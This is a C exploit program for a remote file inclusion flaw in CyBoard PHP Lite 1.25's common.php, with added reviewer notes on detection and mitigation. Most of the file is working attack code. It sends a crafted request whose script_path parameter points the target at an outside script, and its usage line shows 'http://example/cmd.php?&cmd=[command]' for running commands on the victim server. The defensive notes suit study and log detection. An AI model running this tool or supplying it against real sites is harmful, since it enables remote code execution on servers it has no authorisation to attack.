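/* CyBoard PHP Lite <= 1.25 (common.php) Remote File Include */
/* Bug found by SpC-x. */
/* */
/* $ gcc -o f_cbl f_cbl-1.25.c */
/* $ ./f_cbl */
/* 192.168.0.1 /[cyboard_path]/ http://example/cmd.php?&cmd=[command] */
/* */
/* Federico Fazzi */

/*
 * Reviewer notes.
 *
 * Wire format: the program sends a single request line
 *     GET <cyboard_path>include/common.php?script_path=<url>\r\n
 * with no HTTP version token and no headers, and the send length includes
 * the string's terminating NUL byte. The request is capped at REQUEST_MAX
 * bytes including that terminator.
 *
 * Detection: in web-server logs, look for requests to include/common.php
 * whose script_path query parameter holds an absolute URL. A version-less
 * GET line is a further distinguishing trait of this particular client.
 *
 * Mitigation: common.php itself is not part of this listing; going by the
 * advisory title, script_path reaches an include path. Include paths should
 * never be derived from request parameters, and with PHP's allow_url_include
 * and allow_url_fopen turned off, include() does not fetch remote URLs.
 */

/*
 * The header names were lost when this listing was extracted (seven bare
 * #include directives remained). The set below is reconstructed from the
 * functions main() calls.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

#define PORT (80)

/* Size limit the original passed to snprintf(); kept so the request cap is unchanged. */
#define REQUEST_MAX (256)

/*
 * Usage: f_cbl <host> <cyboard_path> <script_url>
 *
 * Builds the request line from argv[2] and argv[3], connects to argv[1] on
 * PORT, sends the request and prints whatever the server returns.
 *
 * Returns 0 on success and -1 on any failure (bad usage, allocation,
 * over-long request, name resolution, socket, connect, send or recv error).
 */
int main(int argc, char *argv[])
{
    int rc = -1;
    int sock = -1;
    int written;
    ssize_t got;
    char *request = NULL;
    char response[256];
    struct sockaddr_in saddr;
    struct hostent *saddrhost;

    /* argv[3] is read below, so four entries are required (the original tested < 3). */
    if (argc < 4) {
        fprintf(stderr, "Usage: %s <host> <cyboard_path> <script_url>\n", argv[0]);
        return -1;
    }

    request = malloc(REQUEST_MAX);
    if (request == NULL) {
        perror("malloc");
        goto out;
    }

    /* Refuse a truncated request instead of silently sending a different one. */
    written = snprintf(request, REQUEST_MAX,
                       "GET %sinclude/common.php?script_path=%s\r\n",
                       argv[2], argv[3]);
    if (written < 0 || written >= REQUEST_MAX) {
        fprintf(stderr, "Request does not fit in %d bytes\n", REQUEST_MAX);
        goto out;
    }

    sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (sock == -1) {
        perror("Socket");
        goto out;
    }

    /* gethostbyname() returns NULL on failure; the original dereferenced it unchecked. */
    saddrhost = gethostbyname(argv[1]);
    if (saddrhost == NULL || saddrhost->h_addr_list[0] == NULL) {
        fprintf(stderr, "Cannot resolve %s\n", argv[1]);
        goto out;
    }

    /* Only copy an address that fits sin_addr; h_length comes from the resolver. */
    if (saddrhost->h_addrtype != AF_INET ||
        (size_t)saddrhost->h_length > sizeof saddr.sin_addr) {
        fprintf(stderr, "Unexpected address type for %s\n", argv[1]);
        goto out;
    }

    memset(&saddr, 0, sizeof saddr);
    memcpy(&saddr.sin_addr, saddrhost->h_addr_list[0], (size_t)saddrhost->h_length);
    saddr.sin_family = AF_INET;
    saddr.sin_port = htons(PORT);

    /* Stop on a failed connect; the original went on to send() and recv() anyway. */
    if (connect(sock, (struct sockaddr *)&saddr, sizeof saddr) == -1) {
        perror("Connect");
        goto out;
    }

    /* The +1 keeps the original wire behaviour: the terminating NUL is sent too. */
    if (send(sock, request, strlen(request) + 1, 0) == -1) {
        perror("Send");
        goto out;
    }

    /*
     * recv() does not NUL-terminate and returns -1 on error. Leave one byte
     * for the terminator and loop only while data arrives; the original
     * passed an unterminated buffer to puts() and spun forever on -1.
     * puts() appends a newline after each chunk, as before.
     */
    while ((got = recv(sock, response, sizeof response - 1, 0)) > 0) {
        response[got] = '\0';
        puts(response);
    }
    if (got == -1) {
        perror("Recv");
        goto out;
    }

    rc = 0;

out:
    free(request);
    if (sock != -1) {
        close(sock);
    }
    return rc;
}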